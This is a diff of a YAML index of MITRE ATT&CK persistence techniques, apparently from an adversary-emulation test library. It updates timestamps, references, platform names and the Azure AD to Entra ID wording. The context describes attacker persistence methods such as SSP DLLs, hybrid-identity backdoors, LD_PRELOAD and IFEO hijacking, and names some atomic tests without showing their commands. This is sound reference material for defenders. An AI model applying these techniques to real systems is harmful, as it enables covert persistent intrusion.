       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -35771,13 +36205,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -35838,9 +36270,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -35849,7 +36281,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -35902,7 +36333,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -35923,12 +36354,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -36012,11 +36442,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -36029,7 +36458,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -36042,7 +36470,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -36072,7 +36499,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -36104,7 +36532,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -36126,8 +36554,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -36153,7 +36579,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -36179,36 +36605,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -36216,9 +36640,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -36227,21 +36651,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -36281,13 +36706,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -36364,12 +36786,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -36388,6 +36809,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -36395,7 +36817,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -36415,29 +36836,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -36514,12 +36937,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -36534,6 +36956,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -36542,18 +36965,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -36585,9 +37008,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -36659,7 +37079,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -36686,7 +37105,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -36712,8 +37131,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests:
     - name: Trap EXIT
@@ -36804,7 +37221,7 @@ persistence:
         name: sh
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -36925,7 +37342,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Shared Library Injection via /etc/ld.so.preload
@@ -37072,7 +37488,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests:
     - name: Create a user account on a Linux system
@@ -37236,7 +37651,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -37346,7 +37760,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests:
     - name: Modify SSH Authorized Keys
@@ -37419,7 +37832,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -37452,8 +37865,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -37484,7 +37895,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -37519,12 +37930,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -37601,7 +38010,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -37655,7 +38063,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests:
     - name: Active Directory Create Admin Account
@@ -37796,7 +38203,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -37826,55 +38233,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -37905,6 +38267,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -37914,9 +38277,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -37924,11 +38291,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
